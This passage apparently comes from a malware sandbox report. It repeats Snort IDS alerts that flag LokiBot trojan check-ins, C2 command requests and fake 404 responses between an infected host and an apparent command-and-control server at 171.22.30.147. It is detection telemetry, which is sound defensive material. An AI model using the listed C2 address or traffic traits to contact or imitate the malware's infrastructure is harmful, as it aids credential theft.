            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49739
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49740 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49740 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49740
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49741 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49741 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49741 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49741
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49742 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49742 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49742
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49743 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49743
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49744 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49744
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49745 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49745
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49746 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49746
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49747 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49747
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49748 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49748
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49749 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49749
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49750 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49750
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49751 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49751
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49752 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49752
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49753 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49753 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49753
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49754 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49754
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49755 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49755
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49756 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49756
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49757 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49757
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49758 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49758
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49759 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49759
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49760 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49760
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49761 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49761
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49762 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49762
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49763 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49763
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49764 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49764 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49764
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49765 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49765
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49766 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49766
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49767 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49767 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49767
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49768 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49768 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49768
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49769 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49769 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49769
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49770 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49770 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49770
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49771 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49771 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49771
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49772 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49772 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49772
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49773 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49773
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49774 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49774 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49774
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49775 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49775 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49775
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49776 -> 171.22.30.147:80
